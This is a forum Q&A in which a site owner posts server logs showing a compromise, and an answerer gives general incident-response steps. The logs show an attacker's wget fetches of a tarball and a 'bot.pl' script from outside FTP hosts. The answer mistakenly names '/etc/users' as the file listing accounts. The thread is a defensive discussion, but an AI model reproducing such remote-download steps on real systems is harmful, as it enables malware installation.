My site host disabled my account after I exceeded my bandwidth. This was odd, since the site is small. I started looking into the logs and while I'm used to seeing attempts to find common endpoints that I don't have, I saw a couple things that were very troubling. First:

% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                             Dload  Upload   Total   Spent    Left  Speed
0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0
100 77597  100 77597    0     0   184k      0 --:--:-- --:--:-- --:--:--  246k
--2019-10-13 11:49:21--  ftp://matei:*password*@tyger.ignorelist.com/tst.tgz
       => `tst.tgz'
Resolving tyger.ignorelist.com... 86.121.73.246
Connecting to tyger.ignorelist.com|86.121.73.246|:21... connected.
Logging in as matei ... Logged in!
==> SYST ... done.    ==> PWD ... done.
==> TYPE I ... done.  ==> CWD not needed.
==> SIZE tst.tgz ... 21765
==> PASV ... done.    ==> RETR tst.tgz ... done.

 0K .......... .......... .                                53.3K=0.4s

2019-10-13 11:49:23 (53.3 KB/s) - `tst.tgz' saved [21765]

and

curl: (7) couldn't connect to host

curl: (7) couldn't connect to host
Can't open perl script "bot.pl": No such file or directory
Can't open perl script "bot.pl": No such file or directory
sh: GET: command not found
sh: GET: command not found
--2019-10-15 22:14:04--  ftp://94.177.240.65/bot.pl
       => `bot.pl'
Connecting to 94.177.240.65:21... --2019-10-15 22:14:04--  
ftp://94.177.240.65/bot.pl
       => `bot.pl'
Connecting to 94.177.240.65:21... failed: Connection refused.
failed: Connection refused.

I've never seen these things. I think I've been taken over somehow. How do I fix it?
kenorb

1 Answer
It looks like your Linux machine has been compromised through the Apache service.

How do I fix it?

There is no simple fix, as you need to investigate your whole system for a potential breach.

Here are some general suggestions:

  • Upgrade Apache to its latest version (via apt-get).
  • Upgrade all your packages (sudo apt-get update).
  • Upgrade all your web CMS/frameworks which are in use (check for any known vulnerabilities).
  • Scan your entire system for any existing vulnerabilities (e.g. malware scanners, antiviruses).
  • Scan all your websites for any malware and shellcode files.
  • If you're using PHP:

  • If you're using shared-hosting, contact the hosting company.
  • Check your system for any extra unexpected users (/etc/users) or files (e.g. in /tmp).
  • If you've confirmed the breach:

    • Change all the exposed credentials (access keys, passwords, etc.).
    • Save all the evidence in case you need it (IP addresses, logs, infected/malware files).
  • After patching your systems, keep monitoring your logs for any further suspicious activity.

If you're not confident with the above, contact an IT company that specializes in that.

See also:

kenorb